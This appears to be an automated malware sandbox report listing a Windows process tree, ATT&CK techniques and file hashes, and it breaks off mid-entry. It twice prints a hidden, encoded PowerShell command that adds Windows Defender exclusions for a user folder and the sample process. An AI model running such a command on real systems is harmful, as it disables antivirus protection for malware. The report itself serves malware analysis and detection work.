C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1988 -ip 1988
1⤵
PID:2652

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\736cf5ee99e04c2bbd11d38a64d4dfea /t 4184 /p 5072
1⤵
PID:4884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA
1⤵
PID:2340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3832 -ip 3832
1⤵
PID:1980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 464 -ip 464
1⤵
PID:4056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4892 -ip 4892
1⤵
PID:2772

C:\Users\Admin\AppData\Local\TypeId\xpbggjcui\AttributeString.exe
C:\Users\Admin\AppData\Local\TypeId\xpbggjcui\AttributeString.exe
1⤵
PID:2468

C:\Users\Admin\AppData\Local\TypeId\xpbggjcui\AttributeString.exe
C:\Users\Admin\AppData\Local\TypeId\xpbggjcui\AttributeString.exe
2⤵
PID:3740

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
3⤵
PID:3032

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
4⤵
PID:1400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3320 -ip 3320
1⤵
PID:3008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 3320 -ip 3320
1⤵
PID:4216

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:2292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA
1⤵
PID:4932

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:4376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1636 -ip 1636
1⤵
PID:2580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 4628 -ip 4628
1⤵
PID:2032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 1636 -ip 1636
1⤵
PID:2052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1636 -ip 1636
1⤵
PID:648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1636 -ip 1636
1⤵
PID:4904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 1636 -ip 1636
1⤵
PID:3056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 1636 -ip 1636
1⤵
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1636 -ip 1636
1⤵
PID:1956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 1636 -ip 1636
1⤵
PID:2132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 2340 -ip 2340
1⤵
PID:464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 2340 -ip 2340
1⤵
PID:2668

C:\Users\Admin\AppData\Local\TypeId\xpbggjcui\AttributeString.exe
C:\Users\Admin\AppData\Local\TypeId\xpbggjcui\AttributeString.exe
1⤵
PID:5444

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:5528

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5660

C:\Windows\svchost.exe
C:\Windows\svchost.exe
1⤵
PID:5980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3692 -ip 3692
1⤵
PID:5804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3500 -ip 3500
1⤵
PID:5256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3648 -ip 3648
1⤵
PID:5416

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE
Filesize
86KB

MD5
3b73078a714bf61d1c19ebc3afc0e454

SHA1
9abeabd74613a2f533e2244c9ee6f967188e4e7e

SHA256
ded54d1fcca07b6bff2bc3b9a1131eac29ff1f836e5d7a7c5c325ec5abe96e29

SHA512
75959d4e8a7649c3268b551a2a378e6d27c0bfb03d2422ebeeb67b0a3f78c079473214057518930f2d72773ce79b106fd2d78405e8e3d8883459dcbb49c163c4

Download Submit
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe
Filesize
175KB

MD5
576410de51e63c3b5442540c8fdacbee

SHA1
8de673b679e0fee6e460cbf4f21ab728e41e0973

SHA256
3f00404dd591c2856e6f71bd78423ed47199902e0b85f228e6c4de72c59ddffe

SHA512
f7761f3878775b30cc3d756fa122e74548dfc0a27e38fa4109e34a59a009df333d074bf14a227549ae347605f271be47984c55148685faac479aeb481f7191db

Download Submit
C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE
Filesize
224KB

MD5
f89440ce4ff5c1295c1799339a530303

SHA1
b3cdd4410c3b3315713a24cd547664a220e7ec0d

SHA256
5fac23766b327e314ff6ccfefa8c5db37aafa58814277a0e16ab1b78dad3beb2

SHA512
8b8c3181b591e40d6e3802a65dd47ffd00e4d59950ec29433db5f484e71ef3a91fd22d5e372b08f4f3ab27a6cc7045e11e181fb112b27d8daa6d260a506d5beb

Download Submit
C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe
Filesize
131KB

MD5
5791075058b526842f4601c46abd59f5

SHA1
b2748f7542e2eebcd0353c3720d92bbffad8678f

SHA256
5c3ef3ec7594c040146e908014791dd15201ba58b4d70032770bb661b6a0e394

SHA512
83e303971ed64019fde9e4ba6f6e889f8fb105088490dfa7dcf579a12baff20ef491f563d132d60c7b24a4fd3cac29bd9dc974571cd162000fae8fba4e0e54fb

Download Submit
C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE
Filesize
254KB

MD5
4ddc609ae13a777493f3eeda70a81d40

SHA1
8957c390f9b2c136d37190e32bccae3ae671c80a

SHA256
16d65f2463658a72dba205dcaa18bc3d0bab4453e726233d68bc176e69db0950

SHA512
9d7f90d1529cab20078c2690bf7bffab5a451a41d8993781effe807e619da0e7292f991da2f0c5c131b111d028b3e6084e5648c90816e74dfb664e7f78181bc5

Download Submit
C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE
Filesize
92KB

MD5
176436d406fd1aabebae353963b3ebcf

SHA1
9ffdfdb8cc832a0c6501c4c0e85b23a0f7eff57a

SHA256
2f947e3ca624ce7373080b4a3934e21644fb070a53feeaae442b15b849c2954f

SHA512
a2d1a714e0c1e5463260c64048ba8fd5064cfa06d4a43d02fc04a30748102ff5ba86d20a08e611e200dc778e2b7b3ae808da48132a05a61aa09ac424a182a06a

Download Submit
C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE
Filesize
142KB

MD5
92dc0a5b61c98ac6ca3c9e09711e0a5d

SHA1
f809f50cfdfbc469561bced921d0bad343a0d7b4

SHA256
3e9da97a7106122245e77f13f3f3cc96c055d732ab841eb848d03ac25401c1bc

SHA512
d9eefb19f82e0786d9be0dbe5e339d25473fb3a09682f40c6d190d4c320cca5556abb72b5d97c6b0da4f8faefdc6d39ac9d0415fdf94ebcc90ecdf2e513c6a31

Download Submit
C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE
Filesize
278KB

MD5
12c29dd57aa69f45ddd2e47620e0a8d9

SHA1
ba297aa3fe237ca916257bc46370b360a2db2223

SHA256
22a585c183e27b3c732028ff193733c2f9d03700a0e95e65c556b0592c43d880

SHA512
255176cd1a88dfa2af3838769cc20dc7ad9d969344801f07b9ebb372c12cee3f47f2dba3559f391deab10650875cad245d9724acfa23a42b336bfa96559a5488

Download Submit
C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe
Filesize
1.2MB

MD5
d47ed8961782d9e27f359447fa86c266

SHA1
d37d3f962c8d302b18ec468b4abe94f792f72a3b

SHA256
b1ec065f71cc40f400e006586d370997102860504fd643b235e8ed9f5607262a

SHA512
3e33f2cdf35024868b183449019de9278035e7966b342ba320a6c601b5629792cbb98a19850d4ca80b906c85d10e8503b0193794d1f1efa849fa33d26cff0669

Download Submit
C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe
Filesize
555KB

MD5
ce82862ca68d666d7aa47acc514c3e3d

SHA1
f458c7f43372dbcdac8257b1639e0fe51f592e28

SHA256
c5a99f42100834599e4995d0a178b32b772a6e774a4050a6bb00438af0a6a1f3

SHA512
bca7afd6589c3215c92fdaca552ad3380f53d3db8c4b69329a1fa81528dd952a14bf012321de92ad1d20e5c1888eab3dd512b1ac80a406baccc37ee6ff4a90dc

Download Submit
C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe
Filesize
1.2MB

MD5
d1c48274711d83d4a1a0cfb2abdf8d31

SHA1
b4367dd7201ef0cc22d56613e428efda07da57a8

SHA256
ade1db79870327538841d5470483c6474083f08d871bb7d56cfc9e76971c8640

SHA512
7a3e7927b8be3dc1706e6511bf04475558da076696435f937c4eafa94111c378f3bcaa1ea4e5063e91e3e333c91f086a75baaff6c5cc190d3d314c5eee1687a3

Download Submit
C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE
Filesize
121KB

MD5
cbd96ba6abe7564cb5980502eec0b5f6

SHA1
74e1fe1429cec3e91f55364e5cb8385a64bb0006

SHA256
405b8bd647fa703e233b8b609a18999abe465a8458168f1daf23197bd2ea36aa

SHA512
a551001853f6b93dfbc6cf6a681820af31330a19d5411076ff3dbce90937b3d92173085a15f29ebf56f2ef12a4e86860ac6723ebc89c98ea31ea7a6c7e3d7cdc

Download Submit
C:\PROGRA~2\COMMON~1\Oracle\Java\JAVAPA~1\java.exe
Filesize
366KB

MD5
f1dd0a0fe1c98603a4d5666f5175a911

SHA1
12bc988ea7a55e6d7fd4c7a59d74393bb8473d4d

SHA256
f5bf98813e2d5a12f3b78f02108f7d16436e2454770599859b1e694d97df4264

SHA512
3196905919cb6c45d287ab9a26d5970ccf710d092c166202e0919989703584dfeab416adc998a50104a7a76fe175838de5544904a32bbc96e19c2f68362ce895

Download Submit
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe
Filesize
325KB

MD5
892cf4fc5398e07bf652c50ef2aa3b88

SHA1
c399e55756b23938057a0ecae597bd9dbe481866

SHA256
e2262c798729169f697e6c30e5211cde604fd8b14769311ff4ea81abba8c2781

SHA512
f16a9e4b1150098c5936ec6107c36d47246dafd5a43e9f4ad9a31ecab69cc789c768691fa23a1440fae7f6e93e8e62566b5c86f7ed6bb4cfe26368149ea8c167

Download Submit
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe
Filesize
505KB

MD5
452c3ce70edba3c6e358fad9fb47eb4c

SHA1
d24ea3b642f385a666159ef4c39714bec2b08636

SHA256
da73b6e071788372702104b9c72b6697e84e7c75e248e964996700b77c6b6f1c

SHA512
fe8a0b9b1386d6931dc7b646d0dd99c3d1b44bd40698b33077e7eeba877b53e5cb39ff2aa0f6919ccab62953a674577bc1b2516d9cadc0c051009b2083a08085

Download Submit
C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE
Filesize
155KB

MD5
96a14f39834c93363eebf40ae941242c

SHA1
5a3a676403d4e6ad0a51d0f0e2bbdd636ae5d6fc

SHA256
8ee4aa23eb92c4aba9a46b18ac249a5fa11c5abb7e2c1ca82cd5196401db790a

SHA512
fbf307a8053e9478a52cfdf8e8bad3d7c6664c893458786ae6ee4fffc6fe93006e99a2a60c97fb62dad1addd5247621517f4edee5d9545717c4587a272cef9a2

Download Submit
C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE
Filesize
230KB

MD5
e5589ec1e4edb74cc7facdaac2acabfd

SHA1
9b12220318e848ed87bb7604d6f6f5df5dbc6b3f

SHA256
6ce92587a138ec07dac387a294d0bbe8ab629599d1a2868d2afaccea3b245d67

SHA512
f36ab33894681f51b9cec7ea5a738eb081a56bcd7625bdd2f5ef2c084e4beb7378be8f292af3aeae79d9317ba57cc41df89f00aef52e58987bdb2eac3f48171a

Download Submit
C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE
Filesize
342KB

MD5
5da33a7b7941c4e76208ee7cddec8e0b

SHA1
cdd2e7b9b0e4be68417d4618e20a8283887c489c

SHA256
531e735e4e8940dfe21e30be0d4179ceaecb57ce431cf63c5044e07048ac1751

SHA512
977aeecfbc693c9d5746fedf08b99e0b0f6fd7b0c7b41ac2b34a832e68a2e6f3c68f38af2e65c87075fcf00c1c6103e34324df45d7da9412cbbeea7e410794b6

Download Submit
C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE
Filesize
439KB

MD5
400836f307cf7dbfb469cefd3b0391e7

SHA1
7af3cbb12d3b2d8b5d9553c687c6129d1dd90a10

SHA256
cb5c5abb625a812d47007c75e3855be3f29da527a41cf03730ad5c81f3eb629a

SHA512
aa53cb304478585d6f83b19a6de4a7938ba2570d380a565a56ff5365aed073d5f56b95ad3228eb7d1e7e6110c6172a58b97bd6a5e57e4a8d39e762ed31dc17c8

Download Submit
C:\PROGRA~2\Google\Update\DISABL~1.EXE
Filesize
207KB

MD5
3b0e91f9bb6c1f38f7b058c91300e582

SHA1
6e2e650941b1a96bb0bb19ff26a5d304bb09df5f

SHA256
57c993cadf4bf84810cea23a7112c6e260624beaab48d0e4332d3462900fec1d

SHA512
a4fbe28a0135f4632e0a5b6bd775f8d010250b0fbfe223db1fe81d18552a6bc166ebce807853ba02e6a476e9829454805e415ca828a5e043bd1e63dc53599d0f

Download Submit
C:\PROGRA~2\MICROS~1\EdgeCore\90.0.818.66\Installer\setup.exe
Filesize
704KB

MD5
515b229fb05cbc15a6e08069f316b060

SHA1
586bc53da7d5cad927e99c1a5ae83ddf762cd9d4

SHA256
f0da9067a9e2794520126ffddc70a30322f4c7e7c790c71c625780509b1093f0

SHA512
6f586428fb5a1291de9f003bb9b4ffe6d40178ea48882d119257ac59a5152a06125d31f43b6a836d823ab0bdc0d344a134ed01e79d483273add09eb26a65072f

Download Submit
C:\PROGRA~2\MICROS~1\EdgeCore\90.0.818.66\identity_helper.exe
Filesize
576KB

MD5
9c8400ba14763892ada7bccbb90efe19

SHA1
4bd7d1a78ccbc26d1cbe47f1cd6bac18acfa762f

SHA256
7e364e6e99f30776a081b9a39e1d203fc12044fefa045eaafbafe29ea562b1fc

SHA512
2e2de13ae708769f9f2addc9494903bd9c43a0e56b7e168b2872e08baa5e7f20daccba4fa53cb8f96a3c5393bd5c8b49893f5e9a7f075b74edc6cd6cf6c9c11e

Download Submit
C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeComRegisterShellARM64.exe
Filesize
200KB

MD5
0a56ae9287a690aac4c2b0e66307d64f

SHA1
b8b1b2ca1c3e1fc50decc309cbd83caf4ee8c8f7

SHA256
06ed4addcca437139ecdee0ea7307c83dda2438daf183e1161648ddf74e15975

SHA512
61cce3293c7b4b6e659f9b99d40cea5302f62bb8a332d45d1690bc129c72bf2a48ed779215c387268dbcee7a727900ffeaffcc16f7ffdb9b8bc1a0ea15e413b5

Download Submit
C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdate.exe
Filesize
250KB

MD5
8276a426ba43984a9f339e6451aedbb3

SHA1
00965ad5ed1578cb220d1f024ab51ee048d0d9fc

SHA256
81df1bd3d6a8fbc580ad8b7d1c40aa92851b49eae10f1f6920f096b76524a4e9

SHA512
b0cb4576a2cbf8f7c0b293f06eb5dcffd1d14c32f4603820a73ee2736263c06afc980547e2bfefa80ca27a37a7a316eb433151fe441651ea2e1b8e9fe564ffc3

Download Submit
C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateBroker.exe
Filesize
139KB

MD5
d75525435aa7684c170c5dc2da79cbd4

SHA1
4db21157c85b98229bd03f6d61fa1bbcaac38cca

SHA256
837aa78c2b5ee6cd161e4020d288d2b46bc380890b5e7070f07252974fdb7190

SHA512
ad7d4e5613a62ceaf8465c2b0e75437fe390532677a444a969b3338868d592e8a43eccd4b25de6828554234d81957baeee4f75c3ff004aa080f821c82f574456

Download Submit
C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateComRegisterShell64.exe
Filesize
244KB

MD5
25b132b0ef2aa14ceba30092c2659be6

SHA1
aeff839c1dfa56d5dcbd6e5b4e7232e3c364ef78

SHA256
7c9bd83409f49cf3e25c407d0847dc141c92b18437a2c32f2d29e255780c24e5

SHA512
17a138269b039f7d73f7b79bc05c75ca49f73359a59c6329c72e0613f54fcd152b3d952423a23bd26797ecf35f4ca6921ef4af3151c88fac25f28104e1011988

Download Submit
C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateCore.exe
Filesize
277KB

MD5
9f742c7e0eca1dd773df895cbdd2b8ab

SHA1
2f0977e3da4564adc67e23fe0d8ad648a998fb21

SHA256
7690edb96e306a365a3b70a01061b27ba6617b6aa19ed9a44e246b90388db83f

SHA512
a9e14debecef621085584fd9e65f5140bdac5d437f62f4873ab7886ecac9d01a95cd11e766b6656451dce2353d7b340a944da4d5d824be5a3b444879a64af4ac

Download Submit
C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateOnDemand.exe
Filesize
139KB

MD5
3d13bdb98b3c19709efcd345d8fd59b4

SHA1
53f5d91bf81a45a5a20d7f3671f31f306754cf2e

SHA256
1cb45e4404fed0ded0bfe7acd8e7c26beff744e0f157e5321d1e7192a4cd33d7

SHA512
319b24eecf06a3ff982b695d3e2dffe45ccdf4bbb1975a8de541c61590e6a87dc3f48cef4befb454110fc364d82bd9a9be2d694c4603a63b1892bd9fc19313cc

Download Submit
C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateSetup.exe
Filesize
448KB

MD5
cdfe6fb89c84d8f44a0c59f9fea21a0d

SHA1
0bf94b1db9f93b8997b7a44b46cbfa4c6b7b0eb0

SHA256
692042bda1ad99d80035086de50757369bc9ca0f25dd5325d500215ca8ec687f

SHA512
87e4441300e493bcfa9144667fb309abd1b57b0c02f6e888002c59d5399bec347319a1089b474b0b4fb2874dbe61fb2d1ea122d8dc01264ffbc80df5c6c3fd2a

Download Submit
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\BHO\ie_to_edge_stub.exe
Filesize
537KB

MD5
23622b7d65653e1dd46db1d10c52d933

SHA1
5278e3311ef9adac97bcd572ef4466161deb921d

SHA256
6e872df59c1f0f474f5f2e1bacd84b8570b08195fe5615a7293eecf540f88505

SHA512
8b2a0c9f71baa78fbe30c82a2f530faf106adabe366200555891af3ea5b52ca327f05e8f53c55d73d94c08fc60433218235b638b0ada1617ee57668087966b26

Download Submit
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\cookie_exporter.exe
Filesize
138KB

MD5
b9c69481857d7550c5ebd77cc50a1d84

SHA1
a2e18198fd96975f9f3206330af9a933e336ddc1

SHA256
3f3063f7da14b31417aa8dbc0e5242a50a29f7948cd1288e0647d9f927129123

SHA512
cb1c02d0aa19210835ab584bdd49fbb9c446bd793d4c0e68f0a0f04f6a5c7e0f595009d544120e71a641f9776c39b17d7c0c5fea76392581f6aa094cd6fb4647

Download Submit
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\elevation_service.exe
Filesize
1.3MB

MD5
dad8eaa12fd00e531bd982a064a0821e

SHA1
6c2ddfbc65678ea49e474449915c6f4a0544fce4

SHA256
477842993c2140a533e9bb2906229ce5767d8d0c3bf1d17c2c7c204257159256

SHA512
c8ac3f970190354c1b126dbeb160fa3d5e84a3f2fdd00b96cc35b8fbcc0085a69133078aeb7946d330af4a9caca8f39f4490ff2fd41028094958294ab74e2215

Download Submit
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedge.exe
Filesize
704KB

MD5
a8c9abf05da15366c665dd52b8e14f2c

SHA1
fa06733702a5ef0a6d6f3342d522d347fbc97a31

SHA256
6f897dd3dac15cf063a00bfd5c2c4d12ca9d091e82be64f159cf0427f4c3b9c5

SHA512
e296ae34d57ae8a97580010c0e6af89f6506cbae959eca4488d5e31c4c7dc21e021843d28928e577bf32c2a155f9d366d328c35b818405e66e9f31d28f5b8c97

Download Submit
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedge_proxy.exe
Filesize
704KB

MD5
f654be977ee6d8a86c08c3c29d0e2502

SHA1
6e441fc4e9b574c4f4fe619dac49c414fb29d477

SHA256
aedcb2c7e62f6b3be1aff72b638ca7bc4f4a3df1a27134c512de359f169f73b4

SHA512
594ad4976c1bc2d2ea7534a3c9ac336fc7a6c3b2939ee3a9c5e9de7a555c3c5d9f98785b3c3fbfba12c3a46106cdfed90324ef26d41f8cea14b431e19bd91f7d

Download Submit
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedge_pwa_launcher.exe
Filesize
704KB

MD5
ba3fa84da614732f56708c333e1ef410

SHA1
ce535a8cfafeae34aed08aedc16fe7ab153f0de7

SHA256
f164b1cbc7fc72b38d7f0a9b4d6542ed97349708c5eea41fd58146357dc69f90

SHA512
519f7ac8ce905f8150c6d04f5b2953cde346bc64ca0677879fa58daaba208cdcedeef4c5afbfbe6dec22c45eb54559c54656beae9b264101b2378dc8863bb5e6

Download Submit
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedgewebview2.exe
Filesize
704KB

MD5
0a06e1aa9661a7c580157f9b3b242ddf

SHA1
4d614dc1f87f540dc63dfb2e3a5c815fc4c56791

SHA256
8d2c8acc47468250084007ebc351dabef24b5b20745589ca6d4f41c6d3f9d25c

SHA512
7cae305ceef27dfd6f9ec89abc72872fd65fa7375b0482853bff1242d09bde875300d4a89225c9e4cb2eedec5a8fad2494af352c90e71e1e9c2c78c882402166

Download Submit
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\notification_helper.exe
Filesize
704KB

MD5
86b4fa03b3da692e843cf5c6f587cf43

SHA1
1496ad5d6cbf5826546f13c05e4d5ec243002b47

SHA256
e99d4618acba0ed7882d44a3f59d5cab9d399dce3f964238c54c2b5829058c0e

SHA512
f39e7d6d199a750177f745b6aa6028f8f8acb260f96740d3384e31d6853ef0facd5e9fdb7adac87d3dba49ced8155878b0bc69fa77d641f28707b577d82d9fb8

Download Submit
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\pwahelper.exe
Filesize
1013KB

MD5
ae233c9a94ac29078a9b84a0e2f21d0e

SHA1
74352f8a9f95dac8d4149592f2ca5cafa3f22df5

SHA256
d351a76537354ee30c5c229ce5ad7684befc6aeac30dbf8c38c03f7780c9ab87

SHA512
4985561bd596b002849f3c840b04b5443385f3eb6ba3e1016090a6623b61b0143c4cc928f2b5aa95a70fda8363359ebbdcdd89a5521e90e93aa1c17903ac4109

Download Submit
C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
Filesize
1024KB

MD5
e54d52f147ada5202c9fc9bc91f4975c

SHA1
d17abfda5a8de81bfcf2bb45676993345ba1381e

SHA256
f3f817d0915dbb4e2dd056caefdfd2af39fdfb4f34635241c079bdb7af20e7da

SHA512
e438b68a19d588ec4234afb940f38d8c9c91d5b9855cd43ea52c5a85e411c1bbe86a2fdba14706b54270168213aaa248dd8140e2a92aca665e532deb79d3af80

Download Submit
C:\PROGRA~2\MICROS~1\Edge\Application\msedge_proxy.exe
Filesize
320KB

MD5
860ee641097914d006ea32f962583c06

SHA1
835b87957d30ca0933a30783c5092b19a6ac166b

SHA256
d967f93c551bfcc748316e81c97297be0cb6089a3b399af57dc389177c4a1ac7

SHA512
2e7752d68bd1afac490735f3afe243329540da08cace5ce83b60d19d2b714ea3665e6a4d3fa93d46c7ff4a45226024f1d62a6a2235fd158ac92c020defa28c8f

Download Submit
C:\PROGRA~2\MICROS~1\Edge\Application\pwahelper.exe
Filesize
320KB

MD5
8d77b22d78cb87095e20a2d33d39dcea

SHA1
1db8db2d580567b860f0c72f6c98c8b1107c35c8

SHA256
e436015ee4a40c0bbfa25843d317391f271e41e6c64789f91e1e1462629d119b

SHA512
23269f83c33746d5c529439d3e29a1af2e997e7f297fc00ccaab04a8cdcc3d7a591317967a9e3dc4f0d36b261bc93bb1f653352b70adb5e0de4c43a5e0853055

Download Submit
C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE
Filesize
267KB

MD5
15163eb05b0a8f65a5ca3c74a658077d

SHA1
8b116062a5754fa2d73fc4df9f635283ae1ccd02

SHA256
8751c43ee0f3f0e080103a9b77be9e79346004769ed43d4cadd630ea15d26dcf

SHA512
a8299e9a522aa58429847920b999598551c1863f63ba473178f61cde43fb91cab6ef62c9e1a51268e54338e012ccfe6428a7c37bc89007d1604fafa2560258c9

Download Submit
C:\PROGRA~2\MOZILL~1\UNINST~1.EXE
Filesize
141KB

MD5
7e3b8ddfa6bd68ca8f557254c3188aea

SHA1
bafaaaa987c86048b0cf0153e1147e1bbad39b0c

SHA256
8270ecef6079a21f5ae22f1a473e5eb8abac51628367f4acf6466529ba11d7e2

SHA512
675ca07cdb787b3f624eae9707daf519214f8dc4670c524cef5110c9dba197e833cedb051919c757c58a3687e63cf175d1397d8ce69c5995f4eab3b85f6dafbb

Download Submit
C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe
Filesize
320KB

MD5
01e8918b3c4935dc4e26a94fe297a716

SHA1
6f709ede92d398d756b841450549fdf62c1efbe6

SHA256
d391ff1e7353a22e5fa2a5bc239e7a0e831d26898af4a812f5bf0c0a5d14ed45

SHA512
8025d063ccffa6b62277a88b65c504290d28a31200358d72840687a16ca8788abd801978560079ee276301c1a73378a997863c550d0cf8123588885fb50219e3

Download Submit
C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE
Filesize
256KB

MD5
